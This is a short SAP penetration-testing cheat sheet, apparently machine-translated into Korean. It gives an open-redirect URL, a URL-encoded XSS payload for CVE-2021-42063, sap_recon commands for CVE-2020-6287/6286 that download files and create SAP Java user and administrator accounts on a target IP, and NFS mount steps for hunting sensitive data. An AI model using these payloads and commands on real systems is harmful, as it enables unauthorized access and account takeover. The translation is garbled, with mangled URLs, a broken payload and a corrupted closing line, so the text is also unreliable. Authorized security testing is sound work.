SAP Pentest Cheatsheet

비스 밀라

Pentest를 수행하려면 네트워크에 SAP 시스템을 배포해야합니다.

1. 개방형 리디렉션 확인

https : // host/sap/public/bc/icf/logoff? redirecturl = maliciousUrl

2. 무담보 프로토콜 (HTTP) 점검

http : // 호스트 : port/startpage

http : // 호스트 : port/sap/public/info

3. 시스템 정보 오해 검사

http : // 호스트 : port/sap/public/info

4. XSS (CVE-2021-42063)

/sapirexthelp https : // localhost/sapirexthelp를 찾으십시오

https : // host/sapirexthelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d 26%23%39%37%26%23%31 %30%38%26%23%31%31%26%23%31%31%34%26%23%31%36%28%26%23%78%34%26%238%36%66%26%23%78%36 %33%26%23%78%37%35%26%23%78%36%64%26%78%36%35%26%23%78%36%65%26%78%37%34%23%78%32%65%26 %23%78%36%34%26%23%78%36%66%26%238%36%64%26%23%78%36%31%26%23%78%36%39%26%78%36%65%29%3E.ASP

5. SAP 정보 시스템 1.0 쉘 업로드

6. CVE-2022-22536 (ICMAD SAP)

7. SAP Recon 취약성 (CVE-2020-6287, CVE-2020-6286)

https://github.com/chipik/sap_recon

zip 파일을 다운로드하십시오

Python Recon.py -h 172.16.30.8 -f /1111.zip

SAP Java 사용자를 만듭니다

Python Recon.py -h 172.16.30.8 -u

SAP Java 관리자 사용자를 만듭니다

Python Recon.py -h 172.16.30.8 -a

1. SSL 취약성 검사

sslscan

2. NFS 마운트

NFS-LS NFS : // 호스트/마운트

mkdir mnt && mount -t nfs 호스트 :/mount ./mnt

민감한 정보를 검색하는 행운을 빕니다

펜 테스트 시뮬레이션을 수행하기 위해 SAP Virtual Machine 또는 컨테이너를 찾고 있습니다. 정보가 있으면 친절하게 DM Me @LinkedIn)

공유는 돌보고 있습니다

ك ك ا ا해 ال الله عليه وسلم : "∎ الناس أنفعهم للناس"